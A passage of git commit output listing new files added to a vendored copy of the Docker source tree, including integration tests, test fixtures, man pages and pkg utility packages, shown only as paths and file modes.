vendor/github.com/docker/docker/integration-cli/docker_cli_pause_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_port_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_proxy_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_prune_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_ps_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_pull_local_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_pull_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_pull_trusted_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_push_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_registry_user_agent_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_rename_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_restart_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_rm_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_rmi_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_run_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_run_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_search_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_secret_create_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_secret_inspect_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_service_create_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_service_health_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_experimental_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_service_scale_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_service_update_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_sni_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_stack_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_start_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_stats_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_stop_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_tag_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_top_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_update_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_update_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_userns_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_v2_only_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_version_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_volume_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_wait_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_experimental_network_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_hub_pull_suite_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_test_vars.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_utils.go create mode 100644 vendor/github.com/docker/docker/integration-cli/events_utils.go create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures.go create mode 100755 vendor/github.com/docker/docker/integration-cli/fixtures/auth/docker-credential-shell-test create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/credentialspecs/valid.json create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/deploy/default.yaml create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/deploy/remove.yaml create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/deploy/secrets.yaml create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/https/client-rogue-cert.pem create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/https/client-rogue-key.pem create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/https/server-rogue-cert.pem create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/https/server-rogue-key.pem create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/load/emptyLayer.tar create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/load/frozen.go create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.crt create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.key create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.crt create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.key create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.crt create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.key create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.crt create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.key create mode 100755 vendor/github.com/docker/docker/integration-cli/fixtures/notary/gen.sh create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/localhost.cert create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/localhost.key create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/registry/cert.pem create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/secrets/default create mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures_linux_daemon.go create mode 100644 vendor/github.com/docker/docker/integration-cli/npipe.go create mode 100644 vendor/github.com/docker/docker/integration-cli/npipe_windows.go create mode 100644 vendor/github.com/docker/docker/integration-cli/registry.go create mode 100644 vendor/github.com/docker/docker/integration-cli/registry_mock.go create mode 100644 vendor/github.com/docker/docker/integration-cli/requirements.go create mode 100644 vendor/github.com/docker/docker/integration-cli/requirements_unix.go create mode 100644 vendor/github.com/docker/docker/integration-cli/test_vars.go create mode 100644 vendor/github.com/docker/docker/integration-cli/test_vars_exec.go create mode 100644 vendor/github.com/docker/docker/integration-cli/test_vars_noexec.go create mode 100644 vendor/github.com/docker/docker/integration-cli/test_vars_noseccomp.go create mode 100644 vendor/github.com/docker/docker/integration-cli/test_vars_seccomp.go create mode 100644 vendor/github.com/docker/docker/integration-cli/test_vars_unix.go create mode 100644 vendor/github.com/docker/docker/integration-cli/test_vars_windows.go create mode 100644 vendor/github.com/docker/docker/integration-cli/trust_server.go create mode 100644 vendor/github.com/docker/docker/integration-cli/utils.go create mode 100644 vendor/github.com/docker/docker/layer/empty.go create mode 100644 vendor/github.com/docker/docker/layer/empty_test.go create mode 100644 vendor/github.com/docker/docker/layer/filestore.go create mode 100644 vendor/github.com/docker/docker/layer/filestore_test.go create mode 100644 vendor/github.com/docker/docker/layer/layer.go create mode 100644 vendor/github.com/docker/docker/layer/layer_store.go create mode 100644 vendor/github.com/docker/docker/layer/layer_store_windows.go create mode 100644 vendor/github.com/docker/docker/layer/layer_test.go create mode 100644 vendor/github.com/docker/docker/layer/layer_unix.go create mode 100644 vendor/github.com/docker/docker/layer/layer_unix_test.go create mode 100644 vendor/github.com/docker/docker/layer/layer_windows.go create mode 100644 vendor/github.com/docker/docker/layer/migration.go create mode 100644 vendor/github.com/docker/docker/layer/migration_test.go create mode 100644 vendor/github.com/docker/docker/layer/mount_test.go create mode 100644 vendor/github.com/docker/docker/layer/mounted_layer.go create mode 100644 vendor/github.com/docker/docker/layer/ro_layer.go create mode 100644 vendor/github.com/docker/docker/layer/ro_layer_windows.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/client.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/client_linux.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/client_solaris.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/client_unix.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/client_windows.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/container.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/container_unix.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/container_windows.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/oom_linux.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/oom_solaris.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/pausemonitor_unix.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/process.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/process_unix.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/process_windows.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/queue_unix.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/remote.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/remote_unix.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/remote_windows.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/types.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/types_linux.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/types_solaris.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/types_windows.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/utils_linux.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/utils_solaris.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/utils_windows.go create mode 100644 vendor/github.com/docker/docker/libcontainerd/utils_windows_test.go create mode 100644 vendor/github.com/docker/docker/man/Dockerfile create mode 100644 vendor/github.com/docker/docker/man/Dockerfile.5.md create mode 100644 vendor/github.com/docker/docker/man/Dockerfile.aarch64 create mode 100644 vendor/github.com/docker/docker/man/Dockerfile.armhf create mode 100644 vendor/github.com/docker/docker/man/Dockerfile.ppc64le create mode 100644 vendor/github.com/docker/docker/man/Dockerfile.s390x create mode 100644 vendor/github.com/docker/docker/man/README.md create mode 100644 vendor/github.com/docker/docker/man/docker-attach.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-build.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-commit.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-config-json.5.md create mode 100644 vendor/github.com/docker/docker/man/docker-cp.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-create.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-diff.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-events.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-exec.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-export.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-history.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-images.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-import.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-info.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-inspect.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-kill.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-load.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-login.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-logout.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-logs.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-network-connect.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-network-create.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-network-disconnect.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-network-inspect.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-network-ls.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-network-rm.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-pause.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-port.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-ps.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-pull.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-push.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-rename.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-restart.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-rm.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-rmi.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-run.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-save.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-search.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-start.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-stats.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-stop.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-tag.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-top.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-unpause.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-update.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-version.1.md create mode 100644 vendor/github.com/docker/docker/man/docker-wait.1.md create mode 100644 vendor/github.com/docker/docker/man/docker.1.md create mode 100644 vendor/github.com/docker/docker/man/dockerd.8.md create mode 100644 vendor/github.com/docker/docker/man/generate.go create mode 100755 vendor/github.com/docker/docker/man/generate.sh create mode 100644 vendor/github.com/docker/docker/man/glide.lock create mode 100644 vendor/github.com/docker/docker/man/glide.yaml create mode 100755 vendor/github.com/docker/docker/man/md2man-all.sh create mode 100644 vendor/github.com/docker/docker/migrate/v1/migratev1.go create mode 100644 vendor/github.com/docker/docker/migrate/v1/migratev1_test.go create mode 100644 vendor/github.com/docker/docker/oci/defaults_linux.go create mode 100644 vendor/github.com/docker/docker/oci/defaults_solaris.go create mode 100644 vendor/github.com/docker/docker/oci/defaults_windows.go create mode 100644 vendor/github.com/docker/docker/oci/devices_linux.go create mode 100644 vendor/github.com/docker/docker/oci/devices_unsupported.go create mode 100644 vendor/github.com/docker/docker/oci/namespaces.go create mode 100644 vendor/github.com/docker/docker/opts/hosts.go create mode 100644 vendor/github.com/docker/docker/opts/hosts_test.go create mode 100644 vendor/github.com/docker/docker/opts/hosts_unix.go create mode 100644 vendor/github.com/docker/docker/opts/hosts_windows.go create mode 100644 vendor/github.com/docker/docker/opts/ip.go create mode 100644 vendor/github.com/docker/docker/opts/ip_test.go create mode 100644 vendor/github.com/docker/docker/opts/mount.go create mode 100644 vendor/github.com/docker/docker/opts/mount_test.go create mode 100644 vendor/github.com/docker/docker/opts/opts.go create mode 100644 vendor/github.com/docker/docker/opts/opts_test.go create mode 100644 vendor/github.com/docker/docker/opts/opts_unix.go create mode 100644 vendor/github.com/docker/docker/opts/opts_windows.go create mode 100644 vendor/github.com/docker/docker/opts/port.go create mode 100644 vendor/github.com/docker/docker/opts/port_test.go create mode 100644 vendor/github.com/docker/docker/opts/quotedstring.go create mode 100644 vendor/github.com/docker/docker/opts/quotedstring_test.go create mode 100644 vendor/github.com/docker/docker/opts/secret.go create mode 100644 vendor/github.com/docker/docker/opts/secret_test.go create mode 100644 vendor/github.com/docker/docker/pkg/README.md create mode 100644 vendor/github.com/docker/docker/pkg/aaparser/aaparser.go create mode 100644 vendor/github.com/docker/docker/pkg/aaparser/aaparser_test.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/README.md create mode 100644 vendor/github.com/docker/docker/pkg/archive/archive.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/archive_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/archive_linux_test.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/archive_other.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/archive_test.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/archive_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/archive_unix_test.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/archive_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/archive_windows_test.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/changes.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/changes_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/changes_other.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/changes_posix_test.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/changes_test.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/changes_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/changes_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/copy.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/copy_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/copy_unix_test.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/copy_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/diff.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/diff_test.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/example_changes.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/testdata/broken.tar create mode 100644 vendor/github.com/docker/docker/pkg/archive/time_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/time_unsupported.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/utils_test.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/whiteouts.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/wrap.go create mode 100644 vendor/github.com/docker/docker/pkg/archive/wrap_test.go create mode 100644 vendor/github.com/docker/docker/pkg/authorization/api.go create mode 100644 vendor/github.com/docker/docker/pkg/authorization/authz.go create mode 100644 vendor/github.com/docker/docker/pkg/authorization/authz_unix_test.go create mode 100644 vendor/github.com/docker/docker/pkg/authorization/middleware.go create mode 100644 vendor/github.com/docker/docker/pkg/authorization/plugin.go create mode 100644 vendor/github.com/docker/docker/pkg/authorization/response.go create mode 100644 vendor/github.com/docker/docker/pkg/broadcaster/unbuffered.go create mode 100644 vendor/github.com/docker/docker/pkg/broadcaster/unbuffered_test.go create mode 100644 vendor/github.com/docker/docker/pkg/chrootarchive/archive.go create mode 100644 vendor/github.com/docker/docker/pkg/chrootarchive/archive_test.go create mode 100644 vendor/github.com/docker/docker/pkg/chrootarchive/archive_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/chrootarchive/archive_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/chrootarchive/chroot_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/chrootarchive/chroot_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/chrootarchive/diff.go create mode 100644 vendor/github.com/docker/docker/pkg/chrootarchive/diff_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/chrootarchive/diff_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/chrootarchive/init_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/chrootarchive/init_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/devicemapper/devmapper.go create mode 100644 vendor/github.com/docker/docker/pkg/devicemapper/devmapper_log.go create mode 100644 vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper.go create mode 100644 vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_deferred_remove.go create mode 100644 vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_no_deferred_remove.go create mode 100644 vendor/github.com/docker/docker/pkg/devicemapper/ioctl.go create mode 100644 vendor/github.com/docker/docker/pkg/devicemapper/log.go create mode 100644 vendor/github.com/docker/docker/pkg/directory/directory.go create mode 100644 vendor/github.com/docker/docker/pkg/directory/directory_test.go create mode 100644 vendor/github.com/docker/docker/pkg/directory/directory_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/directory/directory_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/discovery/README.md create mode 100644 vendor/github.com/docker/docker/pkg/discovery/backends.go create mode 100644 vendor/github.com/docker/docker/pkg/discovery/discovery.go create mode 100644 vendor/github.com/docker/docker/pkg/discovery/discovery_test.go create mode 100644 vendor/github.com/docker/docker/pkg/discovery/entry.go create mode 100644 vendor/github.com/docker/docker/pkg/discovery/file/file.go create mode 100644 vendor/github.com/docker/docker/pkg/discovery/file/file_test.go create mode 100644 vendor/github.com/docker/docker/pkg/discovery/generator.go create mode 100644 vendor/github.com/docker/docker/pkg/discovery/generator_test.go create mode 100644 vendor/github.com/docker/docker/pkg/discovery/kv/kv.go create mode 100644 vendor/github.com/docker/docker/pkg/discovery/kv/kv_test.go create mode 100644 vendor/github.com/docker/docker/pkg/discovery/memory/memory.go create mode 100644 vendor/github.com/docker/docker/pkg/discovery/memory/memory_test.go create mode 100644 vendor/github.com/docker/docker/pkg/discovery/nodes/nodes.go create mode 100644 vendor/github.com/docker/docker/pkg/discovery/nodes/nodes_test.go create mode 100644 vendor/github.com/docker/docker/pkg/filenotify/filenotify.go create mode 100644 vendor/github.com/docker/docker/pkg/filenotify/fsnotify.go create mode 100644 vendor/github.com/docker/docker/pkg/filenotify/poller.go create mode 100644 vendor/github.com/docker/docker/pkg/filenotify/poller_test.go create mode 100644 vendor/github.com/docker/docker/pkg/fileutils/fileutils.go create mode 100644 vendor/github.com/docker/docker/pkg/fileutils/fileutils_darwin.go create mode 100644 vendor/github.com/docker/docker/pkg/fileutils/fileutils_solaris.go create mode 100644 vendor/github.com/docker/docker/pkg/fileutils/fileutils_test.go create mode 100644 vendor/github.com/docker/docker/pkg/fileutils/fileutils_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/fileutils/fileutils_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux_test.go create mode 100644 vendor/github.com/docker/docker/pkg/gitutils/gitutils.go create mode 100644 vendor/github.com/docker/docker/pkg/gitutils/gitutils_test.go create mode 100644 vendor/github.com/docker/docker/pkg/graphdb/conn_sqlite3_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux_test.go create mode 100644 vendor/github.com/docker/docker/pkg/graphdb/sort_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/graphdb/sort_linux_test.go create mode 100644 vendor/github.com/docker/docker/pkg/graphdb/unsupported.go create mode 100644 vendor/github.com/docker/docker/pkg/graphdb/utils_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/homedir/homedir.go create mode 100644 vendor/github.com/docker/docker/pkg/homedir/homedir_test.go create mode 100644 vendor/github.com/docker/docker/pkg/httputils/httputils.go create mode 100644 vendor/github.com/docker/docker/pkg/httputils/httputils_test.go create mode 100644 vendor/github.com/docker/docker/pkg/httputils/mimetype.go create mode 100644 vendor/github.com/docker/docker/pkg/httputils/mimetype_test.go create mode 100644 vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader.go create mode 100644 vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader_test.go create mode 100644 vendor/github.com/docker/docker/pkg/idtools/idtools.go create mode 100644 vendor/github.com/docker/docker/pkg/idtools/idtools_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/idtools/idtools_unix_test.go create mode 100644 vendor/github.com/docker/docker/pkg/idtools/idtools_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/idtools/usergroupadd_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/idtools/usergroupadd_unsupported.go create mode 100644 vendor/github.com/docker/docker/pkg/idtools/utils_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/integration/checker/checker.go create mode 100644 vendor/github.com/docker/docker/pkg/integration/cmd/command.go create mode 100644 vendor/github.com/docker/docker/pkg/integration/cmd/command_test.go create mode 100644 vendor/github.com/docker/docker/pkg/integration/utils.go create mode 100644 vendor/github.com/docker/docker/pkg/integration/utils_test.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/buffer.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/buffer_test.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/bytespipe.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/bytespipe_test.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/fmt.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/fmt_test.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/fswriters.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/fswriters_test.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/multireader.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/multireader_test.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/readers.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/readers_test.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/temp_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/temp_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/writeflusher.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/writers.go create mode 100644 vendor/github.com/docker/docker/pkg/ioutils/writers_test.go create mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/jsonlog.go create mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling.go create mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling_test.go create mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes.go create mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes_test.go create mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling.go create mode 100644 vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling_test.go create mode 100644 vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage.go create mode 100644 vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage_test.go create mode 100644 vendor/github.com/docker/docker/pkg/listeners/listeners_solaris.go create mode 100644 vendor/github.com/docker/docker/pkg/listeners/listeners_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/listeners/listeners_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/locker/README.md create mode 100644 vendor/github.com/docker/docker/pkg/locker/locker.go create mode 100644 vendor/github.com/docker/docker/pkg/locker/locker_test.go create mode 100644 vendor/github.com/docker/docker/pkg/longpath/longpath.go create mode 100644 vendor/github.com/docker/docker/pkg/longpath/longpath_test.go create mode 100644 vendor/github.com/docker/docker/pkg/loopback/attach_loopback.go create mode 100644 vendor/github.com/docker/docker/pkg/loopback/ioctl.go create mode 100644 vendor/github.com/docker/docker/pkg/loopback/loop_wrapper.go create mode 100644 vendor/github.com/docker/docker/pkg/loopback/loopback.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/flags.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/flags_freebsd.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/flags_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/flags_unsupported.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/mount.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/mount_unix_test.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/mounter_freebsd.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/mounter_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/mounter_solaris.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/mounter_unsupported.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/mountinfo.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/mountinfo_freebsd.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/mountinfo_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/mountinfo_linux_test.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/mountinfo_solaris.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/mountinfo_unsupported.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/mountinfo_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux_test.go create mode 100644 vendor/github.com/docker/docker/pkg/mount/sharedsubtree_solaris.go create mode 100644 vendor/github.com/docker/docker/pkg/namesgenerator/cmd/names-generator/main.go create mode 100644 vendor/github.com/docker/docker/pkg/namesgenerator/names-generator.go create mode 100644 vendor/github.com/docker/docker/pkg/namesgenerator/names-generator_test.go create mode 100644 vendor/github.com/docker/docker/pkg/parsers/kernel/kernel.go create mode 100644 vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_darwin.go create mode 100644 vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix_test.go create mode 100644 vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/parsers/kernel/uname_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/parsers/kernel/uname_solaris.go create mode 100644 vendor/github.com/docker/docker/pkg/parsers/kernel/uname_unsupported.go create mode 100644 vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_linux.go create mode 100644 